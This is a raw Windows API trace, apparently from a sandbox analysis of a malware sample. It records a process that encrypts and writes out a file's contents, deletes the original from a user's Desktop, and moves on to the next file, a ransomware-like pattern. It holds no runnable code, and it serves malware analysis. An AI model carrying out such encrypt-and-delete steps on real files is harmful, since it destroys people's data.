lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0128.087] WriteFile (in: hFile=0x258, lpBuffer=0x49e97c8*, nNumberOfBytesToWrite=0x7ef0, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x49e97c8*, lpNumberOfBytesWritten=0x144f194*=0x7ef0, lpOverlapped=0x0) returned 1 [0128.088] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0128.089] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0128.089] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0128.089] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0128.089] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca910, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0128.089] CryptDestroyKey (hKey=0x41ac280) returned 1 [0128.089] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0128.089] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0128.089] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0128.089] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0128.089] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0128.089] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0128.089] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0128.089] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0128.089] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0128.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0128.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797008, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0128.090] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0128.090] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0128.090] FreeLibrary (hLibModule=0x756e0000) returned 1 [0128.090] CloseHandle (hObject=0x2a0) returned 1 [0128.090] CloseHandle (hObject=0x258) returned 1 [0128.147] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\WrCkWcj.m4a", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\WrCkWcj.m4a", lpFilePart=0x0) returned 0x23 [0128.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369dc8 [0128.147] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\WrCkWcj.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\wrckwcj.m4a")) returned 0x20 [0128.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0128.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21c0 [0128.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0128.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0128.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0128.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21e0 [0128.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0128.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0128.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0128.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0128.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369fd8 [0128.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392340 [0128.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392030 [0128.148] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\WrCkWcj.m4a", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48ff38d0, ftCreationTime.dwHighDateTime=0x1d5e475, ftLastAccessTime.dwLowDateTime=0x4b71c330, ftLastAccessTime.dwHighDateTime=0x1d5f11d, ftLastWriteTime.dwLowDateTime=0x4b71c330, ftLastWriteTime.dwHighDateTime=0x1d5f11d, nFileSizeHigh=0x0, nFileSizeLow=0x7ee3, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="WrCkWcj.m4a", cAlternateFileName="")) returned 0x41ac600 [0128.148] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\WrCkWcj.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\wrckwcj.m4a")) returned 1 [0128.248] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48ff38d0, ftCreationTime.dwHighDateTime=0x1d5e475, ftLastAccessTime.dwLowDateTime=0x4b71c330, ftLastAccessTime.dwHighDateTime=0x1d5f11d, ftLastWriteTime.dwLowDateTime=0x4b71c330, ftLastWriteTime.dwHighDateTime=0x1d5f11d, nFileSizeHigh=0x0, nFileSizeLow=0x7ee3, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="WrCkWcj.m4a", cAlternateFileName="")) returned 0 [0128.248] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0128.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392030 | out: hHeap=0x1780000) returned 1 [0128.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0128.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0128.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0128.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369dc8 | out: hHeap=0x1780000) returned 1 [0128.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0128.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0128.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0128.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0128.249] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0128.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0128.249] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0128.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0128.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0128.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0128.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0128.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0128.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf450 | out: hHeap=0x1780000) returned 1 [0128.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0128.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0128.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0128.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050e78 | out: hHeap=0x1780000) returned 1 [0128.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0128.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0128.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0128.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0128.250] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0128.250] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0128.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0128.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0128.250] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0128.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0128.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0128.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0128.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e22c0 [0128.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0128.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0128.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0128.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0128.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0128.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0128.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0128.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0128.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0128.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0128.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0128.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0128.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0128.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050e78 [0128.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0128.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0128.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0128.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0128.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0128.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9890 [0128.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0128.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0128.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0128.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0128.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0128.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0128.251] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0128.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0128.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0128.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0128.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0128.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0128.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0128.252] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0128.252] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0128.252] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0128.252] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0128.252] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0128.252] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0128.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0128.252] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\xV3SDT.ots", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd7bbe40, ftCreationTime.dwHighDateTime=0x1d5e379, ftLastAccessTime.dwLowDateTime=0x31cf1480, ftLastAccessTime.dwHighDateTime=0x1d5e319, ftLastWriteTime.dwLowDateTime=0x31cf1480, ftLastWriteTime.dwHighDateTime=0x1d5e319, nFileSizeHigh=0x0, nFileSizeLow=0x36a1, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="xV3SDT.ots", cAlternateFileName="")) returned 0x41ac500 [0128.252] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0128.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0128.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0128.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0128.252] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0128.252] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0128.253] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0128.253] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392378 [0128.253] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0128.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392378 | out: hHeap=0x1780000) returned 1 [0128.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0128.253] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0128.253] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2180 [0128.253] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0128.253] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0128.253] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0128.253] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0128.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0128.253] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9c50 [0128.253] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0128.253] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0128.253] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0128.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0128.253] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0128.253] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0128.253] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0128.253] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0128.253] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0128.253] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0128.253] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0128.253] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0128.254] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0128.254] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0128.254] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0128.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0128.254] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21c0 [0128.254] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392570 [0128.254] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0128.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392570 | out: hHeap=0x1780000) returned 1 [0128.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0128.254] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0128.254] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21e0 [0128.254] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0128.254] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0128.254] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21c0 [0128.254] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0128.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0128.254] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21c0 [0128.254] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0128.254] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0128.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0128.254] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21f0 [0128.254] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0128.254] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0128.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0128.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9c80 [0128.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0128.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0128.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0128.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0128.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0128.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0128.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0128.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0128.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0128.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0128.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0128.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0128.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0128.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0128.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0128.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0128.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0128.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0128.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0128.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0128.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0128.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0128.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0128.256] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0128.256] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0128.256] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0128.256] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0128.256] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0128.256] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0128.256] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392378 [0128.256] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0128.256] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0128.256] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0128.256] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0128.256] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0128.256] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0128.256] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0128.256] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0128.256] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0128.256] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0128.256] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0128.256] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0128.256] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0128.256] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0128.256] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) 